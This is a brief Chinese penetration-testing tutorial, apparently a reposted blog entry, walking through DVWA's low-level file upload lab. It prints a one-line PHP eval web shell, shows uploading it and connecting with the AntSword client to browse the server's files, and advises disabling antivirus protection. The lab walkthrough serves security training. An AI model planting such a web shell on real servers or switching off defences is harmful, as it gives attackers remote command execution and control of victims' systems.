【滲透測試】|文件上傳

1、安裝使用蟻劍
https://blog.csdn.net/weixin_42474304/article/details/116376746

1、登陸dvwa,進入初級文件上傳，上傳一句話木馬文件cmd.php，

//cmd.php
<?php eval($_POST['ccit']); ?>
//eval: 執行命令的函數
//ccit:一句話木馬文件的參數

在這里插入圖片描述

文件上傳成功，根據提示的上傳路徑得到完整url路徑http://192.xx.xx.xx/dvwa/hackable/uploads/cmd.php
2、打開中國蟻劍
頁面空白處右鍵-添加數據，如圖在這里插入圖片描述
進入下列頁面，填寫url和連接密碼，其他選擇默認
url為：http://192.xx.xx.xx/dvwa/hackable/uploads/cmd.php
連接密碼為：一句話木馬文件中引號里的內容-ccit

填寫完成后，點擊測試連接，若顯示成功，連接成功時，此時可以將該數據進行添加

完成后，中國蟻劍的主頁面出現一條記錄，雙擊該記錄，即可打開文件管理界面，如圖
在這里插入圖片描述

即：上傳一句話木馬文件后，蟻劍連接服務器，管理服務器文件件系統等，成功實現了文件上傳攻擊

特別注意：滲透測試過程中，注意關閉”病毒和威脅防護“或回復被隔離的文件

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/bicheng/19159.shtml
繁體地址，請注明出處：http://hk.pswp.cn/bicheng/19159.shtml
英文地址，請注明出處：http://en.pswp.cn/bicheng/19159.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！